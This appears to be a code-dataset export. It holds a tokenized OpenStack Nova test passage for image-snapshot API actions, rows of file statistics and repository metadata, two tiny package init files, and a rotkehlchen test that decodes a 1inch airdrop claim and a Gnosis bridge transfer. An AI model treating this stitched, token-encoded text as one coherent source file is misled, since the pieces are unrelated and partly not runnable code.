op|':'
string|"'test_value2'"
op|'}'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|','
nl|'\n'
string|"'quiesce_instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|'.'
name|'quiesce_instance'
op|'('
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceQuiesceNotSupported'
op|'('
name|'instance_id'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'test'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'volume'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'size'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'display_description'
op|'='
string|"'fake'"
op|')'
newline|'\n'
name|'snapshot'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'d'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|','
string|"'volume_api'"
op|')'
newline|'\n'
name|'volume_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'volume_api'
newline|'\n'
name|'volume_api'
op|'.'
name|'get'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'volume'
op|')'
newline|'\n'
name|'volume_api'
op|'.'
name|'create_snapshot_force'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'image_id'
op|'='
name|'location'
op|'.'
name|'replace'
op|'('
name|'self'
op|'.'
name|'image_base_url'
op|','
string|"''"
op|')'
newline|'\n'
name|'image'
op|'='
name|'image_service'
op|'.'
name|'show'
op|'('
name|'None'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
name|'properties'
op|'='
name|'image'
op|'['
string|"'properties'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'test_key1'"
op|']'
op|','
string|"'test_value1'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'test_key2'"
op|']'
op|','
string|"'test_value2'"
op|')'
newline|'\n'
name|'if'
name|'extra_metadata'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'key'
op|','
name|'val'
name|'in'
name|'extra_metadata'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
name|'key'
op|']'
op|','
name|'val'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vol_backed_img_with_meta_from_vol_without_extra_meta
dedent|''
dedent|''
dedent|''
name|'def'
name|'test_create_vol_backed_img_with_meta_from_vol_without_extra_meta'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vol_backed_img_with_meta_from_vol_with_extra_meta
dedent|''
name|'def'
name|'test_create_vol_backed_img_with_meta_from_vol_with_extra_meta'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
nl|'\n'
name|'extra_metadata'
op|'='
op|'{'
string|"'a'"
op|':'
string|"'b'"
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_snapshots_disabled
dedent|''
name|'def'
name|'test_create_image_snapshots_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Don\'t permit a snapshot if the allow_instance_snapshots flag is\n False\n """'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'allow_instance_snapshots'
op|'='
name|'False'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_with_metadata
dedent|''
name|'def'
name|'test_create_image_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
op|'{'
string|"'key'"
op|':'
string|"'asdf'"
op|'}'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'image_url'
op|'+'
string|"'123'"
name|'if'
name|'self'
op|'.'
name|'image_url'
name|'else'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"'123'"
op|')'
op|','
name|'location'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_with_too_much_metadata
dedent|''
name|'def'
name|'test_create_image_with_too_much_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
op|'{'
op|'}'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'num'
name|'in'
name|'range'
op|'('
name|'CONF'
op|'.'
name|'quota_metadata_items'
op|'+'
number|'1'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'['
string|"'foo%i'"
op|'%'
name|'num'
op|']'
op|'='
string|'"bar"'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPForbidden'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_no_name
dedent|''
name|'def'
name|'test_create_image_no_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_blank_name
dedent|''
name|'def'
name|'test_create_image_blank_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"''"
op|','
nl|'\n'
op|'}'
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_bad_metadata
dedent|''
name|'def'
name|'test_create_image_bad_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'geoff'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
string|"'henry'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_create_image_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|snapshot
indent|' '
name|'def'
name|'snapshot'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'snapshot'"
op|','
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"createImage"'
op|':'
op|'{'
nl|'\n'
string|'"name"'
op|':'
string|'"test_snapshot"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.037613 | 104 | 0.595273 | 15,247 | 102,091 | 3.859645 | 0.030104 | 0.181281 | 0.080377 | 0.088023 | 0.929581 | 0.8993 | 0.86302 | 0.831515 | 0.802321 | 0.768335 | 0 | 0.003376 | 0.097658 | 102,091 | 8,480 | 105 | 12.039033 | 0.635436 | 0 | 0 | 0.962972 | 0 | 0 | 0.348816 | 0.050759 | 0 | 0 | 0 | 0 | 0.010024 | 0 | null | null | 0.003066 | 0.002241 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
47990727a22621b3372eff5ba37c9f815848c143 | 49 | py | Python | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 6 | 2021-08-17T09:26:16.000Z | 2022-03-30T23:17:42.000Z | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 3 | 2021-08-17T09:42:47.000Z | 2021-09-27T05:56:38.000Z | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 5 | 2021-08-18T14:25:48.000Z | 2022-03-28T02:59:16.000Z | from . import embedding
#from . import encoder
| 16.333333 | 24 | 0.734694 | 6 | 49 | 6 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204082 | 49 | 2 | 25 | 24.5 | 0.923077 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
479ec410bb3142f6e515a874959bd29be6cd6d94 | 37 | py | Python | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | from .is_file_dcd import is_file_dcd
| 18.5 | 36 | 0.864865 | 8 | 37 | 3.5 | 0.625 | 0.428571 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.848485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
47a5781e03c481abb1be2b2f1bf522a4d229a694 | 19,881 | py | Python | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 137 | 2018-03-05T11:53:29.000Z | 2019-11-03T16:38:42.000Z | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 385 | 2018-03-08T12:43:41.000Z | 2019-11-10T09:15:36.000Z | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 59 | 2018-03-08T10:08:27.000Z | 2019-10-26T11:30:44.000Z | import pytest
from rotkehlchen.accounting.structures.balance import Balance
from rotkehlchen.accounting.structures.base import (
HistoryBaseEntry,
HistoryEventSubType,
HistoryEventType,
)
from rotkehlchen.assets.asset import EthereumToken
from rotkehlchen.chain.ethereum.decoding.constants import CPT_GAS, CPT_GNOSIS_CHAIN
from rotkehlchen.chain.ethereum.decoding.decoder import EVMTransactionDecoder
from rotkehlchen.chain.ethereum.modules.airdrops.constants import CPT_ONEINCH
from rotkehlchen.chain.ethereum.structures import EthereumTxReceipt, EthereumTxReceiptLog
from rotkehlchen.chain.ethereum.types import string_to_ethereum_address
from rotkehlchen.constants.assets import A_ETH
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.db.ethtx import DBEthTx
from rotkehlchen.fval import FVal
from rotkehlchen.types import EthereumTransaction, Location, deserialize_evm_tx_hash
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.hexbytes import hexstring_to_bytes
@pytest.mark.parametrize('ethereum_accounts', [['0xc931De6d845846E332a52D045072E3feF540Bd5d']]) # noqa: E501
def test_1inch_claim(database, ethereum_manager, eth_transactions):
"""Data for claim taken from
https://etherscan.io/tx/0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0xc931De6d845846E332a52D045072E3feF540Bd5d',
to_address='0xE295aD71242373C37C5FdA7B57F26f9eA1088AFe',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x2e7ba6ef000000000000000000000000000000000000000000000000000000000000c0e5000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d00000000000000000000000000000000000000000000002109156970b0a5f32f00000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000010dbe83b35ea054d18e5fdd804d60b6a528f4b66a227079ecb82febf8eb40919495d102f8922e57278b2b6bb3369ae34c37c378dbd4819126c5e5d371ed4777c4580a9985219f50d16cefc798c2aeb6a4d7fa786f4f38ab27b420e6f3f8e25bd0f45709afe1f9fdec3cbea17d1ec63c6f62ce396524b04c9460bb05ef548239ae050b5330a4228c26b8b25ff021c6cc89ed4f0411ecce80256d090d860f9e6ff5e604076af74bd91959259ff59f8d54455a0edcad41ef1fe230504826f025769c250d89c63241d1dfec9dc4dc75f0a0ec47bcc10594ca7db74335507a5f6e4344b52b129d8e0aaeffe22b7595fa9f11c8e2381feafaf25042407913b9ec34cdf879a05d18a68b7a2506a29ba42fb004c7f32390f986f943a2557e304dc777f73869a046dc08506268e16603452a33ea179b4932eeae59338dd3fee75685cc490f1acba6c0ed0c90792bb6f9f696ad1417efe0032bb0e86b6927234ce419628e24c0d577b40b8956166e4d21cba88b58b32dec0a00b2864e8ed4ac5d7be6683f5f297aaf35d6ca208a954554f4ab14a1ca973daf13e7c1dad49db82611f4dadf2a3c32355753f5e11ba88adc0d27f10ad32ad4904bfd782c15693c6795b047124fccd0f927a7dda89206be7ad613644d02a622c3f30f5de40d052b4c3e10ef02a18107e7a23a7abca2aacc0bf854e247569f822013a86927b10f772b7b13fbc8732'), # noqa: E501
nonce=19,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=297,
data=hexstring_to_bytes('0x00000000000000000000000000000000000000000000002109156970b0a5f32f'), # noqa: E501
address=string_to_ethereum_address('0x111111111117dC0aa78b770fA6A738034120C302'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000e295ad71242373c37c5fda7b57f26f9ea1088afe'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=298,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000000000c0e5000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d00000000000000000000000000000000000000000000002109156970b0a5f32f'), # noqa: E501
address=string_to_ethereum_address('0xE295aD71242373C37C5FdA7B57F26f9eA1088AFe'),
removed=False,
topics=[
hexstring_to_bytes('0x4ec90e965519d92681267467f775ada5bd214aa92c0dc93d90a5e880ce9ed026'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0xc931De6d845846E332a52D045072E3feF540Bd5d',
notes='Burned 0.00393701451 ETH in gas from 0xc931De6d845846E332a52D045072E3feF540Bd5d', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17',
sequence_index=298,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.RECEIVE,
event_subtype=HistoryEventSubType.AIRDROP,
asset=EthereumToken('0x111111111117dC0aa78b770fA6A738034120C302'),
balance=Balance(amount=FVal('609.397099685988397871'), usd_value=ZERO),
location_label='0xc931De6d845846E332a52D045072E3feF540Bd5d',
notes='Claim 609.397099685988397871 1INCH from the 1INCH airdrop',
counterparty=CPT_ONEINCH,
),
]
assert events == expected_events
@pytest.mark.parametrize('ethereum_accounts', [['0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4']]) # noqa: E501
def test_gnosis_chain_bridge(database, ethereum_manager, eth_transactions):
"""Data for bridge taken from
https://etherscan.io/tx/0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
to_address='0x88ad09518695c6c3712AC10a214bE5109a655671',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x09c5eabe000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000002e43f7658fd000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000000000000000000000000000000000000000013500050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf6f6a78083ca3e2a662d6dd1703c939c8ace2e268d88ad09518695c6c3712ac10a214be5109a655671000927c00101006401867f7a4d000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000003f615ba21bc6cc5d4a6d798c5950cc5c42937fbd00000000000000000000000000000000000000000000000007392088b40d14000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000004000000000000000000000000006c187e1b71ffbee4429003bb846c1b3eb1610000000000000000000000000000000000000000000000000000048c52ee05b140000000000000000000000000000000000000000000000000000000000000000000000000000000000000105041b1c1c1c73a08c7605fa9c69f068338cb7cd1c8dd21189cbe56f4cc66cff8dc7f0b0c8cc8c64433ea24643b893c9062beae6a05656b1df5643a242533d63925144c3e5c7dfd0509fb3c4232cfdb4c500e942a95b23439b3e18bab4a40057e1bdfae2d9967025b3f8fdca13354b25250c0d7fa9e4b472dc97df1f0cd0f595dc266d09e711628b3a63c1a6e4c83a11d3655891e31901eacf73b927e10bfbe6b0d5ed808cc228d606779a19a7dfb7393956b4fada14eaef8f6de6ee3824e67d6df18cc2d55f00cf869cc920135a94fb4abc213dc43e97812879d9efab046e4fffb931dcb55e5aa2b86f6a848408fea42cd221df99f1720b2ce22830498d78d04e1d083ba12800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'), # noqa: E501
nonce=12,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=473,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000250d51ce33'), # noqa: E501
address=string_to_ethereum_address('0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x00000000000000000000000088ad09518695c6c3712ac10a214be5109a655671'), # noqa: E501
hexstring_to_bytes('0x0000000000000000000000005edcf547ece0ea1765d6c02e9e5bae53b52e09d4'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=474,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000250d51ce33'), # noqa: E501
address=string_to_ethereum_address('0x88ad09518695c6c3712AC10a214bE5109a655671'),
removed=False,
topics=[
hexstring_to_bytes('0x9afd47907e25028cdaca89d193518c302bbb128617d5a992c5abd45815526593'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48'), # noqa: E501
hexstring_to_bytes('0x0000000000000000000000005edcf547ece0ea1765d6c02e9e5bae53b52e09d4'), # noqa: E501
hexstring_to_bytes('0x00050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf9'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=6,
data=hexstring_to_bytes('0x0000000000000000000000000000000000000000000000000000000000000001'), # noqa: E501
address=string_to_ethereum_address('0x4c36d2919e407f0cc2ee3c993ccf8ac26d9ce64e'),
removed=False,
topics=[
hexstring_to_bytes('0x27333edb8bdcd40a0ae944fb121b5e2d62ea782683946654a0f5e607a908d578'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000f6a78083ca3e2a662d6dd1703c939c8ace2e268d'), # noqa: E501
hexstring_to_bytes('0x00000000000000000000000088ad09518695c6c3712ac10a214be5109a655671'), # noqa: E501
hexstring_to_bytes('0x00050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf9'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
notes='Burned 0.00393701451 ETH in gas from 0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02',
sequence_index=474,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.TRANSFER,
event_subtype=HistoryEventSubType.BRIDGE,
asset=EthereumToken('0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48'),
balance=Balance(amount=FVal('159137.254963'), usd_value=ZERO),
location_label='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
notes='Bridge 159137.254963 USDC from gnosis chain',
counterparty=CPT_GNOSIS_CHAIN,
),
]
assert events == expected_events
